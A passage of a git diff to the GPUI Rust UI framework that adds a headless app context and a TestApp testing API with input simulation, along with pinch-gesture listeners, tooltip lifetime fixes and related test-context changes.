Unlike the old `HeadlessMetalAppContext`, this works on any platform. It uses +/// `TestPlatform` for deterministic scheduling and accepts a pluggable +/// `PlatformTextSystem` so tests get real glyph measurements. +/// +/// # Usage +/// +/// ```ignore +/// let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new("fallback")); +/// let mut cx = HeadlessAppContext::with_platform( +/// text_system, +/// Arc::new(Assets), +/// || gpui_platform::current_headless_renderer(), +/// ); +/// ``` +pub struct HeadlessAppContext { + /// The underlying app cell. + pub app: Rc, + /// The background executor for running async tasks. + pub background_executor: BackgroundExecutor, + /// The foreground executor for running tasks on the main thread. + pub foreground_executor: ForegroundExecutor, + dispatcher: TestDispatcher, + text_system: Arc, +} + +impl HeadlessAppContext { + /// Creates a new headless app context with the given text system. + pub fn new(platform_text_system: Arc) -> Self { + Self::with_platform(platform_text_system, Arc::new(()), || None) + } + + /// Creates a new headless app context with a custom text system and asset source. + pub fn with_asset_source( + platform_text_system: Arc, + asset_source: Arc, + ) -> Self { + Self::with_platform(platform_text_system, asset_source, || None) + } + + /// Creates a new headless app context with the given text system, asset source, + /// and an optional renderer factory for screenshot support. + pub fn with_platform( + platform_text_system: Arc, + asset_source: Arc, + renderer_factory: impl Fn() -> Option> + 'static, + ) -> Self { + let seed = std::env::var("SEED") + .ok() + .and_then(|s| s.parse().ok()) + .unwrap_or(0); + + let dispatcher = TestDispatcher::new(seed); + let arc_dispatcher = Arc::new(dispatcher.clone()); + let background_executor = BackgroundExecutor::new(arc_dispatcher.clone()); + let foreground_executor = ForegroundExecutor::new(arc_dispatcher); + + let renderer_factory: Box Option>> = + Box::new(renderer_factory); + let platform = TestPlatform::with_platform( + background_executor.clone(), + foreground_executor.clone(), + platform_text_system.clone(), + Some(renderer_factory), + ); + + let text_system = Arc::new(TextSystem::new(platform_text_system)); + let http_client = http_client::FakeHttpClient::with_404_response(); + let app = App::new_app(platform, asset_source, http_client); + app.borrow_mut().mode = GpuiMode::test(); + + Self { + app, + background_executor, + foreground_executor, + dispatcher, + text_system, + } + } + + /// Opens a window for headless rendering. + pub fn open_window( + &mut self, + size: Size, + build_root: impl FnOnce(&mut Window, &mut App) -> Entity, + ) -> Result> { + use crate::{point, px}; + + let bounds = Bounds { + origin: point(px(0.0), px(0.0)), + size, + }; + + let mut cx = self.app.borrow_mut(); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + focus: false, + show: false, + ..Default::default() + }, + build_root, + ) + } + + /// Runs all pending tasks until parked. + pub fn run_until_parked(&self) { + self.dispatcher.run_until_parked(); + } + + /// Advances the simulated clock. + pub fn advance_clock(&self, duration: Duration) { + self.dispatcher.advance_clock(duration); + } + + /// Enables parking mode, allowing blocking on real I/O (e.g., async asset loading). + pub fn allow_parking(&self) { + self.dispatcher.allow_parking(); + } + + /// Disables parking mode, returning to deterministic test execution. + pub fn forbid_parking(&self) { + self.dispatcher.forbid_parking(); + } + + /// Updates app state. + pub fn update(&mut self, f: impl FnOnce(&mut App) -> R) -> R { + let mut app = self.app.borrow_mut(); + f(&mut app) + } + + /// Updates a window and calls draw to render. + pub fn update_window( + &mut self, + window: AnyWindowHandle, + f: impl FnOnce(AnyView, &mut Window, &mut App) -> R, + ) -> Result { + let mut app = self.app.borrow_mut(); + app.update_window(window, f) + } + + /// Captures a screenshot from a window. + /// + /// Requires that the context was created with a renderer factory that + /// returns `Some` via [`HeadlessAppContext::with_platform`]. + pub fn capture_screenshot(&mut self, window: AnyWindowHandle) -> Result { + let mut app = self.app.borrow_mut(); + app.update_window(window, |_, window, _| window.render_to_image())? + } + + /// Returns the text system. + pub fn text_system(&self) -> &Arc { + &self.text_system + } + + /// Returns the background executor. + pub fn background_executor(&self) -> &BackgroundExecutor { + &self.background_executor + } + + /// Returns the foreground executor. + pub fn foreground_executor(&self) -> &ForegroundExecutor { + &self.foreground_executor + } +} + +impl Drop for HeadlessAppContext { + fn drop(&mut self) { + // Shut down the app so windows are closed and entity handles are + // released before the LeakDetector runs. + self.app.borrow_mut().shutdown(); + } +} + +impl AppContext for HeadlessAppContext { + fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { + let mut app = self.app.borrow_mut(); + app.new(build_entity) + } + + fn reserve_entity(&mut self) -> Reservation { + let mut app = self.app.borrow_mut(); + app.reserve_entity() + } + + fn insert_entity( + &mut self, + reservation: Reservation, + build_entity: impl FnOnce(&mut Context) -> T, + ) -> Entity { + let mut app = self.app.borrow_mut(); + app.insert_entity(reservation, build_entity) + } + + fn update_entity( + &mut self, + handle: &Entity, + update: impl FnOnce(&mut T, &mut Context) -> R, + ) -> R { + let mut app = self.app.borrow_mut(); + app.update_entity(handle, update) + } + + fn as_mut<'a, T>(&'a mut self, _: &Entity) -> GpuiBorrow<'a, T> + where + T: 'static, + { + panic!("Cannot use as_mut with HeadlessAppContext. Call update() instead.") + } + + fn read_entity(&self, handle: &Entity, read: impl FnOnce(&T, &App) -> R) -> R + where + T: 'static, + { + let app = self.app.borrow(); + app.read_entity(handle, read) + } + + fn update_window(&mut self, window: AnyWindowHandle, f: F) -> Result + where + F: FnOnce(AnyView, &mut Window, &mut App) -> T, + { + let mut lock = self.app.borrow_mut(); + lock.update_window(window, f) + } + + fn read_window( + &self, + window: &WindowHandle, + read: impl FnOnce(Entity, &App) -> R, + ) -> Result + where + T: 'static, + { + let app = self.app.borrow(); + app.read_window(window, read) + } + + fn background_spawn(&self, future: impl Future + Send + 'static) -> Task + where + R: Send + 'static, + { + self.background_executor.spawn(future) + } + + fn read_global(&self, callback: impl FnOnce(&G, &App) -> R) -> R + where + G: Global, + { + let app = self.app.borrow(); + app.read_global(callback) + } +} diff --git a/crates/gpui/src/app/test_app.rs b/crates/gpui/src/app/test_app.rs new file mode 100644 index 0000000000000000000000000000000000000000..268fa891b563289b85195097d27e06d0b3e15680 --- /dev/null +++ b/crates/gpui/src/app/test_app.rs @@ -0,0 +1,607 @@ +//! A clean testing API for GPUI applications. +//! +//! `TestApp` provides a simpler alternative to `TestAppContext` with: +//! - Automatic effect flushing after updates +//! - Clean window creation and inspection +//! - Input simulation helpers +//! +//! # Example +//! ```ignore +//! #[test] +//! fn test_my_view() { +//! let mut app = TestApp::new(); +//! +//! let mut window = app.open_window(|window, cx| { +//! MyView::new(window, cx) +//! }); +//! +//! window.update(|view, window, cx| { +//! view.do_something(cx); +//! }); +//! +//! // Check rendered state +//! assert_eq!(window.title(), Some("Expected Title")); +//! } +//! ``` + +use crate::{ + AnyWindowHandle, App, AppCell, AppContext, AsyncApp, BackgroundExecutor, BorrowAppContext, + Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke, + MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, + PlatformTextSystem, Point, Render, Size, Task, TestDispatcher, TestPlatform, TextSystem, + Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, +}; +use std::{future::Future, rc::Rc, sync::Arc, time::Duration}; + +/// A test application context with a clean API. +/// +/// Unlike `TestAppContext`, `TestApp` automatically flushes effects after +/// each update and provides simpler window management. +pub struct TestApp { + app: Rc, + platform: Rc, + background_executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + #[allow(dead_code)] + dispatcher: TestDispatcher, + text_system: Arc, +} + +impl TestApp { + /// Create a new test application. + pub fn new() -> Self { + Self::with_seed(0) + } + + /// Create a new test application with a specific random seed. + pub fn with_seed(seed: u64) -> Self { + Self::build(seed, None, Arc::new(())) + } + + /// Create a new test application with a custom text system for real font shaping. + pub fn with_text_system(text_system: Arc) -> Self { + Self::build(0, Some(text_system), Arc::new(())) + } + + /// Create a new test application with a custom text system and asset source. + pub fn with_text_system_and_assets( + text_system: Arc, + asset_source: Arc, + ) -> Self { + Self::build(0, Some(text_system), asset_source) + } + + fn build( + seed: u64, + platform_text_system: Option>, + asset_source: Arc, + ) -> Self { + let dispatcher = TestDispatcher::new(seed); + let arc_dispatcher = Arc::new(dispatcher.clone()); + let background_executor = BackgroundExecutor::new(arc_dispatcher.clone()); + let foreground_executor = ForegroundExecutor::new(arc_dispatcher); + let platform = match platform_text_system.clone() { + Some(ts) => TestPlatform::with_text_system( + background_executor.clone(), + foreground_executor.clone(), + ts, + ), + None => TestPlatform::new(background_executor.clone(), foreground_executor.clone()), + }; + let http_client = http_client::FakeHttpClient::with_404_response(); + let text_system = Arc::new(TextSystem::new( + platform_text_system.unwrap_or_else(|| platform.text_system.clone()), + )); + + let app = App::new_app(platform.clone(), asset_source, http_client); + app.borrow_mut().mode = GpuiMode::test(); + + Self { + app, + platform, + background_executor, + foreground_executor, + dispatcher, + text_system, + } + } + + /// Run a closure with mutable access to the App context. + /// Automatically runs until parked after the closure completes. + pub fn update(&mut self, f: impl FnOnce(&mut App) -> R) -> R { + let result = { + let mut app = self.app.borrow_mut(); + app.update(f) + }; + self.run_until_parked(); + result + } + + /// Run a closure with read-only access to the App context. + pub fn read(&self, f: impl FnOnce(&App) -> R) -> R { + let app = self.app.borrow(); + f(&app) + } + + /// Create a new entity in the app. + pub fn new_entity( + &mut self, + build: impl FnOnce(&mut Context) -> T, + ) -> Entity { + self.update(|cx| cx.new(build)) + } + + /// Update an entity. + pub fn update_entity( + &mut self, + entity: &Entity, + f: impl FnOnce(&mut T, &mut Context) -> R, + ) -> R { + self.update(|cx| entity.update(cx, f)) + } + + /// Read an entity. + pub fn read_entity( + &self, + entity: &Entity, + f: impl FnOnce(&T, &App) -> R, + ) -> R { + self.read(|cx| f(entity.read(cx), cx)) + } + + /// Open a test window with the given root view, using maximized bounds. + pub fn open_window( + &mut self, + build_view: impl FnOnce(&mut Window, &mut Context) -> V, + ) -> TestAppWindow { + let bounds = self.read(|cx| Bounds::maximized(None, cx)); + let handle = self.update(|cx| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |window, cx| cx.new(|cx| build_view(window, cx)), + ) + .unwrap() + }); + + TestAppWindow { + handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } + + /// Open a test window with specific options. + pub fn open_window_with_options( + &mut self, + options: WindowOptions, + build_view: impl FnOnce(&mut Window, &mut Context) -> V, + ) -> TestAppWindow { + let handle = self.update(|cx| { + cx.open_window(options, |window, cx| cx.new(|cx| build_view(window, cx))) + .unwrap() + }); + + TestAppWindow { + handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } + + /// Run pending tasks until there's nothing left to do. + pub fn run_until_parked(&self) { + self.background_executor.run_until_parked(); + } + + /// Advance the simulated clock by the given duration. + pub fn advance_clock(&self, duration: Duration) { + self.background_executor.advance_clock(duration); + } + + /// Spawn a future on the foreground executor. + pub fn spawn(&self, f: impl FnOnce(AsyncApp) -> Fut) -> Task + where + Fut: Future + 'static, + R: 'static, + { + self.foreground_executor.spawn(f(self.to_async())) + } + + /// Spawn a future on the background executor. + pub fn background_spawn(&self, future: impl Future + Send + 'static) -> Task + where + R: Send + 'static, + { + self.background_executor.spawn(future) + } + + /// Get an async handle to the app. + pub fn to_async(&self) -> AsyncApp { + AsyncApp { + app: Rc::downgrade(&self.app), + background_executor: self.background_executor.clone(), + foreground_executor: self.foreground_executor.clone(), + } + } + + /// Get the background executor. + pub fn background_executor(&self) -> &BackgroundExecutor { + &self.background_executor + } + + /// Get the foreground executor. + pub fn foreground_executor(&self) -> &ForegroundExecutor { + &self.foreground_executor + } + + /// Get the text system. + pub fn text_system(&self) -> &Arc { + &self.text_system + } + + /// Check if a global of the given type exists. + pub fn has_global(&self) -> bool { + self.read(|cx| cx.has_global::()) + } + + /// Set a global value. + pub fn set_global(&mut self, global: G) { + self.update(|cx| cx.set_global(global)); + } + + /// Read a global value. + pub fn read_global(&self, f: impl FnOnce(&G, &App) -> R) -> R { + self.read(|cx| f(cx.global(), cx)) + } + + /// Update a global value. + pub fn update_global(&mut self, f: impl FnOnce(&mut G, &mut App) -> R) -> R { + self.update(|cx| cx.update_global(f)) + } + + // Platform simulation methods + + /// Write text to the simulated clipboard. + pub fn write_to_clipboard(&self, item: ClipboardItem) { + self.platform.write_to_clipboard(item); + } + + /// Read from the simulated clipboard. + pub fn read_from_clipboard(&self) -> Option { + self.platform.read_from_clipboard() + } + + /// Get URLs that have been opened via `cx.open_url()`. + pub fn opened_url(&self) -> Option { + self.platform.opened_url.borrow().clone() + } + + /// Check if a file path prompt is pending. + pub fn did_prompt_for_new_path(&self) -> bool { + self.platform.did_prompt_for_new_path() + } + + /// Simulate answering a path selection dialog. + pub fn simulate_new_path_selection( + &self, + select: impl FnOnce(&std::path::Path) -> Option, + ) { + self.platform.simulate_new_path_selection(select); + } + + /// Check if a prompt dialog is pending. + pub fn has_pending_prompt(&self) -> bool { + self.platform.has_pending_prompt() + } + + /// Simulate answering a prompt dialog. + pub fn simulate_prompt_answer(&self, button: &str) { + self.platform.simulate_prompt_answer(button); + } + + /// Get all open windows. + pub fn windows(&self) -> Vec { + self.read(|cx| cx.windows()) + } +} + +impl Default for TestApp { + fn default() -> Self { + Self::new() + } +} + +/// A test window with inspection and simulation capabilities. +pub struct TestAppWindow { + handle: WindowHandle, + app: Rc, + platform: Rc, + background_executor: BackgroundExecutor, +} + +impl TestAppWindow { + /// Get the window handle. + pub fn handle(&self) -> WindowHandle { + self.handle + } + + /// Get the root view entity. + pub fn root(&self) -> Entity { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |root_view, _, _| { + root_view.downcast::().expect("root view type mismatch") + }) + .expect("window not found") + } + + /// Update the root view. + pub fn update(&mut self, f: impl FnOnce(&mut V, &mut Window, &mut Context) -> R) -> R { + let result = { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |root_view, window, cx| { + let view = root_view.downcast::().expect("root view type mismatch"); + view.update(cx, |view, cx| f(view, window, cx)) + }) + .expect("window not found") + }; + self.background_executor.run_until_parked(); + result + } + + /// Read the root view. + pub fn read(&self, f: impl FnOnce(&V, &App) -> R) -> R { + let app = self.app.borrow(); + let view = self + .app + .borrow() + .windows + .get(self.handle.window_id()) + .and_then(|w| w.as_ref()) + .and_then(|w| w.root.clone()) + .and_then(|r| r.downcast::().ok()) + .expect("window or root view not found"); + f(view.read(&app), &app) + } + + /// Get the window title. + pub fn title(&self) -> Option { + let app = self.app.borrow(); + app.read_window(&self.handle, |_, _cx| { + // TODO: expose title through Window API + None + }) + .unwrap() + } + + /// Simulate a keystroke. + pub fn simulate_keystroke(&mut self, keystroke: &str) { + let keystroke = Keystroke::parse(keystroke).unwrap(); + { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.dispatch_keystroke(keystroke, cx); + }) + .unwrap(); + } + self.background_executor.run_until_parked(); + } + + /// Simulate multiple keystrokes (space-separated). + pub fn simulate_keystrokes(&mut self, keystrokes: &str) { + for keystroke in keystrokes.split(' ') { + self.simulate_keystroke(keystroke); + } + } + + /// Simulate typing text. + pub fn simulate_input(&mut self, input: &str) { + for char in input.chars() { + self.simulate_keystroke(&char.to_string()); + } + } + + /// Simulate a mouse move. + pub fn simulate_mouse_move(&mut self, position: Point) { + self.simulate_event(MouseMoveEvent { + position, + modifiers: Default::default(), + pressed_button: None, + }); + } + + /// Simulate a mouse down event. + pub fn simulate_mouse_down(&mut self, position: Point, button: MouseButton) { + self.simulate_event(MouseDownEvent { + position, + button, + modifiers: Default::default(), + click_count: 1, + first_mouse: false, + }); + } + + /// Simulate a mouse up event. + pub fn simulate_mouse_up(&mut self, position: Point, button: MouseButton) { + self.simulate_event(MouseUpEvent { + position, + button, + modifiers: Default::default(), + click_count: 1, + }); + } + + /// Simulate a click at the given position. + pub fn simulate_click(&mut self, position: Point, button: MouseButton) { + self.simulate_mouse_down(position, button); + self.simulate_mouse_up(position, button); + } + + /// Simulate a scroll event. + pub fn simulate_scroll(&mut self, position: Point, delta: Point) { + self.simulate_event(crate::ScrollWheelEvent { + position, + delta: crate::ScrollDelta::Pixels(delta), + modifiers: Default::default(), + touch_phase: crate::TouchPhase::Moved, + }); + } + + /// Simulate an input event. + pub fn simulate_event(&mut self, event: E) { + let platform_input = event.to_platform_input(); + { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.dispatch_event(platform_input, cx); + }) + .unwrap(); + } + self.background_executor.run_until_parked(); + } + + /// Simulate resizing the window. + pub fn simulate_resize(&mut self, size: Size) { + let window_id = self.handle.window_id(); + let mut app = self.app.borrow_mut(); + if let Some(Some(window)) = app.windows.get_mut(window_id) { + if let Some(test_window) = window.platform_window.as_test() { + test_window.simulate_resize(size); + } + } + drop(app); + self.background_executor.run_until_parked(); + } + + /// Force a redraw of the window. + pub fn draw(&mut self) { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + } +} + +impl Clone for TestAppWindow { + fn clone(&self) -> Self { + Self { + handle: self.handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::{FocusHandle, Focusable, div, prelude::*}; + + struct Counter { + count: usize, + focus_handle: FocusHandle, + } + + impl Counter { + fn new(_window: &mut Window, cx: &mut Context) -> Self { + let focus_handle = cx.focus_handle(); + Self { + count: 0, + focus_handle, + } + } + + fn increment(&mut self, _cx: &mut Context) { + self.count += 1; + } + } + + impl Focusable for Counter { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } + } + + impl Render for Counter { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().child(format!("Count: {}", self.count)) + } + } + + #[test] + fn test_basic_usage() { + let mut app = TestApp::new(); + + let mut window = app.open_window(Counter::new); + + window.update(|counter, _window, cx| { + counter.increment(cx); + }); + + window.read(|counter, _| { + assert_eq!(counter.count, 1); + }); + + drop(window); + app.update(|cx| cx.shutdown()); + } + + #[test] + fn test_entity_creation() { + let mut app = TestApp::new(); + + let entity = app.new_entity(|cx| Counter { + count: 42, + focus_handle: cx.focus_handle(), + }); + + app.read_entity(&entity, |counter, _| { + assert_eq!(counter.count, 42); + }); + + app.update_entity(&entity, |counter, _cx| { + counter.count += 1; + }); + + app.read_entity(&entity, |counter, _| { + assert_eq!(counter.count, 43); + }); + } + + #[test] + fn test_globals() { + let mut app = TestApp::new(); + + struct MyGlobal(String); + impl Global for MyGlobal {} + + assert!(!app.has_global::()); + + app.set_global(MyGlobal("hello".into())); + + assert!(app.has_global::()); + + app.read_global::(|global, _| { + assert_eq!(global.0, "hello"); + }); + + app.update_global::(|global, _| { + global.0 = "world".into(); + }); + + app.read_global::(|global, _| { + assert_eq!(global.0, "world"); + }); + } +} diff --git a/crates/gpui/src/app/test_context.rs b/crates/gpui/src/app/test_context.rs index dd4f37ed2a561f4259b41241c7cf4c83790a2b2f..d8f459df3c54200f07b4584eeb8e1ffa8415554b 100644 --- a/crates/gpui/src/app/test_context.rs +++ b/crates/gpui/src/app/test_context.rs @@ -5,7 +5,7 @@ use crate::{ ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, TestScreenCaptureSource, TestWindow, TextSystem, VisualContext, Window, WindowBounds, - WindowHandle, WindowOptions, app::GpuiMode, + WindowHandle, WindowOptions, app::GpuiMode, window::ElementArenaScope, }; use anyhow::{anyhow, bail}; use futures::{Stream, StreamExt, channel::oneshot}; @@ -18,8 +18,6 @@ use std::{ /// an implementation of `Context` with additional methods that are useful in tests. #[derive(Clone)] pub struct TestAppContext { - #[doc(hidden)] - pub app: Rc, #[doc(hidden)] pub background_executor: BackgroundExecutor, #[doc(hidden)] @@ -30,6 +28,8 @@ pub struct TestAppContext { text_system: Arc, fn_name: Option<&'static str>, on_quit: Rc>>>, + #[doc(hidden)] + pub app: Rc, } impl AppContext for TestAppContext { @@ -232,6 +232,33 @@ impl TestAppContext { .unwrap() } + /// Opens a new window with a specific size. + /// + /// Unlike `add_window` which uses maximized bounds, this allows controlling + /// the window dimensions, which is important for layout-sensitive tests. + pub fn open_window( + &mut self, + window_size: Size, + build_window: F, + ) -> WindowHandle + where + F: FnOnce(&mut Window, &mut Context) -> V, + V: 'static + Render, + { + let mut cx = self.app.borrow_mut(); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(Bounds { + origin: Point::default(), + size: window_size, + })), + ..Default::default() + }, + |window, cx| cx.new(|cx| build_window(window, cx)), + ) + .unwrap() + } + /// Adds a new window with no content. pub fn add_empty_window(&mut self) -> &mut VisualTestContext { let mut cx = self.app.borrow_mut(); @@ -402,8 +429,8 @@ impl TestAppContext { } /// Wait until there are no more pending tasks. - pub fn run_until_parked(&mut self) { - self.background_executor.run_until_parked() + pub fn run_until_parked(&self) { + self.dispatcher.run_until_parked(); } /// Simulate dispatching an action to the currently focused node in the window. @@ -819,6 +846,8 @@ impl VisualTestContext { E: Element, { self.update(|window, cx| { + let _arena_scope = ElementArenaScope::enter(&cx.element_arena); + window.invalidator.set_phase(DrawPhase::Prepaint); let mut element = Drawable::new(f(window, cx)); element.layout_as_root(space.into(), window, cx); @@ -830,6 +859,9 @@ impl VisualTestContext { window.invalidator.set_phase(DrawPhase::None); window.refresh(); + drop(element); + cx.element_arena.borrow_mut().clear(); + (request_layout_state, prepaint_state) }) } diff --git a/crates/gpui/src/color.rs b/crates/gpui/src/color.rs index bb41a2f996e250b8c73377922f81170bb432321f..75585bcd90881513d835d28d260319d08acf9c4d 100644 --- a/crates/gpui/src/color.rs +++ b/crates/gpui/src/color.rs @@ -820,6 +820,15 @@ impl LinearColorStop { } impl Background { + /// Returns the solid color if this is a solid background, None otherwise. + pub fn as_solid(&self) -> Option { + if self.tag == BackgroundTag::Solid { + Some(self.solid) + } else { + None + } + } + /// Use specified color space for color interpolation. /// /// diff --git a/crates/gpui/src/elements/deferred.rs b/crates/gpui/src/elements/deferred.rs index 9498734198dbe58798867ebe7f20138e5667777b..25245fa4b6ea70284658bf0b91b53ca395b750dd 100644 --- a/crates/gpui/src/elements/deferred.rs +++ b/crates/gpui/src/elements/deferred.rs @@ -62,7 +62,7 @@ impl Element for Deferred { ) { let child = self.child.take().unwrap(); let element_offset = window.element_offset(); - window.defer_draw(child, element_offset, self.priority) + window.defer_draw(child, element_offset, self.priority, None) } fn paint( diff --git a/crates/gpui/src/elements/div.rs b/crates/gpui/src/elements/div.rs index 2b4a3c84e8111796bf7ce32a4c6ad83854ded6fd..bdda213dfd0f45c8d57b94bd830f966beb1c0050 100644 --- a/crates/gpui/src/elements/div.rs +++ b/crates/gpui/src/elements/div.rs @@ -15,6 +15,7 @@ //! and Tailwind-like styling that you can use to build your own custom elements. Div is //! constructed by combining these two systems into an all-in-one element. +use crate::PinchEvent; use crate::{ AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, @@ -353,6 +354,35 @@ impl Interactivity { })); } + /// Bind the given callback to pinch gesture events during the bubble phase. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + pub fn on_pinch(&mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) { + self.pinch_listeners + .push(Box::new(move |event, phase, hitbox, window, cx| { + if phase == DispatchPhase::Bubble && hitbox.is_hovered(window) { + (listener)(event, window, cx); + } + })); + } + + /// Bind the given callback to pinch gesture events during the capture phase. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + pub fn capture_pinch( + &mut self, + listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static, + ) { + self.pinch_listeners + .push(Box::new(move |event, phase, _hitbox, window, cx| { + if phase == DispatchPhase::Capture { + (listener)(event, window, cx); + } else { + cx.propagate(); + } + })); + } + /// Bind the given callback to an action dispatch during the capture phase. /// The imperative API equivalent to [`InteractiveElement::capture_action`]. /// @@ -635,6 +665,10 @@ impl Interactivity { pub fn block_mouse_except_scroll(&mut self) { self.hitbox_behavior = HitboxBehavior::BlockMouseExceptScroll; } + + fn has_pinch_listeners(&self) -> bool { + !self.pinch_listeners.is_empty() + } } /// A trait for elements that want to use the standard GPUI event handlers that don't @@ -905,6 +939,26 @@ pub trait InteractiveElement: Sized { self } + /// Bind the given callback to pinch gesture events during the bubble phase. + /// The fluent API equivalent to [`Interactivity::on_pinch`]. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + fn on_pinch(mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) -> Self { + self.interactivity().on_pinch(listener); + self + } + + /// Bind the given callback to pinch gesture events during the capture phase. + /// The fluent API equivalent to [`Interactivity::capture_pinch`]. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + fn capture_pinch( + mut self, + listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static, + ) -> Self { + self.interactivity().capture_pinch(listener); + self + } /// Capture the given action, before normal action dispatch can fire. /// The fluent API equivalent to [`Interactivity::capture_action`]. /// @@ -1290,6 +1344,9 @@ pub(crate) type MouseMoveListener = pub(crate) type ScrollWheelListener = Box; +pub(crate) type PinchListener = + Box; + pub(crate) type ClickListener = Rc; pub(crate) type DragListener = @@ -1644,6 +1701,7 @@ pub struct Interactivity { pub(crate) mouse_pressure_listeners: Vec, pub(crate) mouse_move_listeners: Vec, pub(crate) scroll_wheel_listeners: Vec, + pub(crate) pinch_listeners: Vec, pub(crate) key_down_listeners: Vec, pub(crate) key_up_listeners: Vec, pub(crate) modifiers_changed_listeners: Vec, @@ -1847,6 +1905,7 @@ impl Interactivity { || !self.click_listeners.is_empty() || !self.aux_click_listeners.is_empty() || !self.scroll_wheel_listeners.is_empty() + || self.has_pinch_listeners() || self.drag_listener.is_some() || !self.drop_listeners.is_empty() || self.tooltip_builder.is_some() @@ -1886,18 +1945,18 @@ impl Interactivity { // high for the maximum scroll, we round the scroll max to 2 decimal // places here. let padded_content_size = self.content_size + padding_size; - let scroll_max = (padded_content_size - bounds.size) + let scroll_max = Point::from(padded_content_size - bounds.size) .map(round_to_two_decimals) .max(&Default::default()); // Clamp scroll offset in case scroll max is smaller now (e.g., if children // were removed or the bounds became larger). let mut scroll_offset = scroll_offset.borrow_mut(); - scroll_offset.x = scroll_offset.x.clamp(-scroll_max.width, px(0.)); + scroll_offset.x = scroll_offset.x.clamp(-scroll_max.x, px(0.)); if scroll_to_bottom { - scroll_offset.y = -scroll_max.height; + scroll_offset.y = -scroll_max.y; } else { - scroll_offset.y = scroll_offset.y.clamp(-scroll_max.height, px(0.)); + scroll_offset.y = scroll_offset.y.clamp(-scroll_max.y, px(0.)); } if let Some(mut scroll_handle_state) = tracked_scroll_handle { @@ -2213,6 +2272,13 @@ impl Interactivity { }) } + for listener in self.pinch_listeners.drain(..) { + let hitbox = hitbox.clone(); + window.on_mouse_event(move |event: &PinchEvent, phase, window, cx| { + listener(event, phase, &hitbox, window, cx); + }) + } + if self.hover_style.is_some() || self.base_style.mouse_cursor.is_some() || cx.active_drag.is_some() && !self.drag_over_styles.is_empty() @@ -2497,7 +2563,8 @@ impl Interactivity { let pending_mouse_down = pending_mouse_down.clone(); let source_bounds = hitbox.bounds; move |window: &Window| { - pending_mouse_down.borrow().is_none() + !window.last_input_was_keyboard() + && pending_mouse_down.borrow().is_none() && source_bounds.contains(&window.mouse_position()) } }); @@ -2517,18 +2584,24 @@ impl Interactivity { ); } + // We unconditionally bind both the mouse up and mouse down active state handlers + // Because we might not get a chance to render a frame before the mouse up event arrives. let active_state = element_state .clicked_state .get_or_insert_with(Default::default) .clone(); - if active_state.borrow().is_clicked() { + + { + let active_state = active_state.clone(); window.on_mouse_event(move |_: &MouseUpEvent, phase, window, _cx| { - if phase == DispatchPhase::Capture { + if phase == DispatchPhase::Capture && active_state.borrow().is_clicked() { *active_state.borrow_mut() = ElementClickedState::default(); window.refresh(); } }); - } else { + } + + { let active_group_hitbox = self .group_active_style .as_ref() @@ -2994,21 +3067,29 @@ fn handle_tooltip_mouse_move( } Action::ScheduleShow => { let delayed_show_task = window.spawn(cx, { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(active_tooltip); let build_tooltip = build_tooltip.clone(); let check_is_hovered_during_prepaint = check_is_hovered_during_prepaint.clone(); async move |cx| { cx.background_executor().timer(TOOLTIP_SHOW_DELAY).await; + let Some(active_tooltip) = weak_active_tooltip.upgrade() else { + return; + }; cx.update(|window, cx| { let new_tooltip = build_tooltip(window, cx).map(|(view, tooltip_is_hoverable)| { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(&active_tooltip); ActiveTooltip::Visible { tooltip: AnyTooltip { view, mouse_position: window.mouse_position(), check_visible_and_update: Rc::new( move |tooltip_bounds, window, cx| { + let Some(active_tooltip) = + weak_active_tooltip.upgrade() + else { + return false; + }; handle_tooltip_check_visible_and_update( &active_tooltip, tooltip_is_hoverable, @@ -3087,11 +3168,14 @@ fn handle_tooltip_check_visible_and_update( Action::Hide => clear_active_tooltip(active_tooltip, window), Action::ScheduleHide(tooltip) => { let delayed_hide_task = window.spawn(cx, { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(active_tooltip); async move |cx| { cx.background_executor() 